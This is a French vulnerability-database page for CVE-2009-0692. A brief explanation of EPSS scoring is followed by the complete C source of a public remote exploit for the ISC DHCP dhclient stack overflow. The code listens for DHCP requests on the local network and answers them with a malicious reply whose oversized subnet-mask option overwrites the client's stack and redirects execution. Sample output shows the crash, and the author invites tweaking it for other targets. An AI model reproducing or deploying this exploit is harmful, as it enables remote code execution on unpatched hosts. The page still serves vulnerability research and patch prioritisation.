CVE-2009-0692 : Détail

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

/* * cve-2009-0692.c * * ISC DHCP dhclient < 3.1.2p1 Remote Exploit * Jon Oberheide <[email protected]> * http://jon.oberheide.org * * Information: * * http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0692 * * Stack-based buffer overflow in the script_write_params method in * client/dhclient.c in ISC DHCP dhclient 4.1 before 4.1.0p1, 4.0 before * 4.0.1p1, 3.1 before 3.1.2p1, 3.0, and 2.0 allows remote DHCP servers to * execute arbitrary code via a crafted subnet-mask option. * * Usage: * * $ gcc cve-2009-0692.c -o cve-2009-0692 -lpcap -ldnet * $ sudo ./cve-2009-0692 * [+] listening on eth0: ip and udp and src port 68 and dst port 67 * [+] snarfed DHCP request from 00:19:d1:90:e5:4a with xid 0x120f8920 * [+] sending malicious DHCP response to 00:19:d1:90:e5:4a with xid 0x120f8920 * * $ gdb /sbin/dhclient * ... * DHCPREQUEST on eth0 to 255.255.255.255 port 67 * DHCPACK from 0.6.9.2 * ... * Program received signal SIGSEGV, Segmentation fault. * 0x41414141 in ?? () * * Notes: * * Only tested with dhclient 3.1.2 on 32-bit Gentoo / GCC 4.3.3. Feel free * to tweak for your target platform. Depends on libdnet and libpcap. * * READABLE_1 and READABLE_2 need to be readable addresses as we fix up the * stack during our overflow. After a successful return from the vulnerable * script_write_params function, EIP will be set to JMP_TARGET. * * Exclusively for use at DEFCON next week. ;-) */ #include <ctype.h> #include <stdio.h> #include <stdlib.h> #include <stdint.h> #include <string.h> #include <unistd.h> #include <dnet.h> #include <pcap.h> #define READABLE_1 "\xa8\xfc\x0b\x08" /* for es.client */ #define READABLE_2 "\xbc\x34\x0a\x08" /* for es.prefix */ #define JMP_TARGET "\x41\x41\x41\x41" #define BPF_FILTER "ip and udp and src port 68 and dst port 67" #define PKT_BUFSIZ 1514 #define DHCP_OP_REQUEST 1 #define DHCP_OP_REPLY 2 #define DHCP_TYPE_REQUEST 3 #define DHCP_TYPE_ACK 5 #define DHCP_OPT_REQIP 50 #define DHCP_OPT_MSGTYPE 53 #define DHCP_OPT_END 255 #define DHCP_CHADDR_LEN 16 #define SERVERNAME_LEN 64 #define BOOTFILE_LEN 128 #define DHCP_HDR_LEN 240 #define DHCP_OPT_HDR_LEN 2 #ifndef __GNUC__ # define __attribute__(x) # pragma pack(1) #endif struct dhcp_hdr { uint8_t op; uint8_t hwtype; uint8_t hwlen; uint8_t hwopcount; uint32_t xid; uint16_t secs; uint16_t flags; uint32_t ciaddr; uint32_t yiaddr; uint32_t siaddr; uint32_t giaddr; uint8_t chaddr[DHCP_CHADDR_LEN]; uint8_t servername[SERVERNAME_LEN]; uint8_t bootfile[BOOTFILE_LEN]; uint32_t cookie; } __attribute__((__packed__)); struct dhcp_opt { uint8_t opt; uint8_t len; } __attribute__((__packed__)); #ifndef __GNUC__ # pragma pack() #endif void process(u_char *data, const struct pcap_pkthdr *pkthdr, const u_char *pkt) { eth_t *raw; struct ip_hdr *ip_h; struct eth_hdr *eth_h; struct udp_hdr *udp_h; struct dhcp_hdr *dhcp_h; struct dhcp_opt *dhcp_opt; char *dev = data, *ptr; char pktbuf[PKT_BUFSIZ], options[PKT_BUFSIZ], payload[PKT_BUFSIZ]; int opt_len, clen = pkthdr->caplen; uint8_t msg_type = 0, payload_len = 0; uint32_t yiaddr = 0; /* packet too short */ if (clen < ETH_HDR_LEN + IP_HDR_LEN + UDP_HDR_LEN + DHCP_HDR_LEN + DHCP_OPT_HDR_LEN) { return; } eth_h = (struct eth_hdr *) pkt; ip_h = (struct ip_hdr *) ((char *) eth_h + ETH_HDR_LEN); udp_h = (struct udp_hdr *) ((char *) ip_h + IP_HDR_LEN); dhcp_h = (struct dhcp_hdr *) ((char *) udp_h + UDP_HDR_LEN); dhcp_opt = (struct dhcp_opt *) ((char *) dhcp_h + DHCP_HDR_LEN); /* only care about REQUEST opcodes */ if (dhcp_h->op != DHCP_OP_REQUEST) { return; } /* parse DHCP options */ while (1) { if (dhcp_opt->opt == DHCP_OPT_MSGTYPE) { if (dhcp_opt->len != 1) { return; } memcpy(&msg_type, (char *) dhcp_opt + DHCP_OPT_HDR_LEN, dhcp_opt->len); } if (dhcp_opt->opt == DHCP_OPT_REQIP) { if (dhcp_opt->len != 4) { return; } memcpy(&yiaddr, (char *) dhcp_opt + DHCP_OPT_HDR_LEN, dhcp_opt->len); } if (dhcp_opt->opt == DHCP_OPT_END) { break; } if (((char *) dhcp_opt - (char *) pkt) + DHCP_OPT_HDR_LEN + dhcp_opt->len > clen) { break; } dhcp_opt = (struct dhcp_opt *) ((char *) dhcp_opt + DHCP_OPT_HDR_LEN + dhcp_opt->len); } /* only care about REQUEST msg types */ if (msg_type != DHCP_TYPE_REQUEST) { return; } printf("[+] snarfed DHCP request from %s with xid 0x%08x\n", eth_ntoa(&eth_h->eth_src), dhcp_h->xid); printf("[+] sending malicious DHCP response to %s with xid 0x%08x\n\n", eth_ntoa(&eth_h->eth_src), dhcp_h->xid); /* construct stack payload */ memset(payload, 0, sizeof(payload)); ptr = payload; memset(ptr, 0, 16); ptr += 16; memcpy(ptr, READABLE_1, 4); ptr += 4; memcpy(ptr, READABLE_2, 4); ptr += 4; memset(ptr, 0, 8); ptr += 8; memcpy(ptr, "\x04\x00\x00\x00", 4); ptr += 4; memset(ptr, 0, 28); ptr += 28; memcpy(ptr, JMP_TARGET, 4); ptr += 4; payload_len = ptr - payload; /* dhcp header */ dhcp_h->op = DHCP_OP_REPLY; memcpy(&dhcp_h->yiaddr, &yiaddr, 4); /* normal dhcp options */ memset(options, 0, sizeof(options)); ptr = options; memcpy(ptr, "\x35\x01\x05", 3); ptr += 3; memcpy(ptr, "\x36\x04\x00\x06\x09\x02", 6); ptr += 6; memcpy(ptr, "\x33\x04\x00\x09\x3a\x80", 6); ptr += 6; memcpy(ptr, "\x03\x04\x00\x06\x09\x02", 6); ptr += 6; memcpy(ptr, "\x06\x04\x00\x06\x09\x02", 6); ptr += 6; /* malicious subnet mask option */ memcpy(ptr, "\x01", 1); ptr += 1; memcpy(ptr, &payload_len, 1); ptr += 1; memcpy(ptr, payload, payload_len); ptr += payload_len; memcpy(ptr, "\xff", 1); ptr += 1; opt_len = ptr - options; /* construct full packet payload */ memset(pktbuf, 0, sizeof(pktbuf)); ptr = pktbuf; eth_pack_hdr(ptr, ETH_ADDR_BROADCAST, "\xc1\x1e\x20\x09\x06\x92", ETH_TYPE_IP); ptr += ETH_HDR_LEN; ip_pack_hdr(ptr, 0, IP_HDR_LEN + UDP_HDR_LEN + DHCP_HDR_LEN + opt_len, 0x0692, IP_DF, 64, IP_PROTO_UDP, 34145792, IP_ADDR_BROADCAST); ptr += IP_HDR_LEN; udp_pack_hdr(ptr, 67, 68, UDP_HDR_LEN + DHCP_HDR_LEN + opt_len); ptr += UDP_HDR_LEN; memcpy(ptr, dhcp_h, DHCP_HDR_LEN); ptr += DHCP_HDR_LEN; memcpy(ptr, options, opt_len); ptr += opt_len; ip_checksum(pktbuf + ETH_HDR_LEN, IP_HDR_LEN + UDP_HDR_LEN + DHCP_HDR_LEN + opt_len); /* fire off malicious response */ raw = eth_open(dev); if (!raw) { fprintf(stderr, "[-] error opening raw socket on %s\n", dev); exit(1); } eth_send(raw, pktbuf, ETH_HDR_LEN + IP_HDR_LEN + UDP_HDR_LEN + DHCP_HDR_LEN + opt_len); eth_close(raw); } void usage(char **argv) { fprintf(stderr, "usage: %s [-i interface]\n", argv[0]); exit(1); } int main(int argc, char **argv) { int ch, ret; char *dev = NULL; char errbuf[PCAP_ERRBUF_SIZE]; struct bpf_program bfp; pcap_t *ph; opterr = 0; while ((ch = getopt(argc, argv, "i:")) != -1) { switch (ch) { case 'i': dev = optarg; break; default: usage(argv); } } if (!dev) { dev = pcap_lookupdev(errbuf); if (!dev) { fprintf(stderr, "[-] couldn't find default interface: %s\n", errbuf); exit(1); } } ph = pcap_open_live(dev, PKT_BUFSIZ, 1, 1, errbuf); if (!ph) { fprintf(stderr, "[-] couldn't open interface %s: %s\n", dev, errbuf); exit(1); } ret = pcap_compile(ph, &bfp, BPF_FILTER, 1, 0); if (ret == -1) { fprintf(stderr, "[-] couldn't parse BPF filter: %s\n", pcap_geterr(ph)); exit(1); } pcap_setfilter(ph, &bfp); if (ret == -1) { fprintf(stderr, "[-] couldn't set BPF filter: %s\n", pcap_geterr(ph)); exit(1); } printf("[+] listening on %s: %s\n", dev, BPF_FILTER); pcap_loop(ph, -1, process, dev); return 0; } // milw0rm.com [2009-07-27]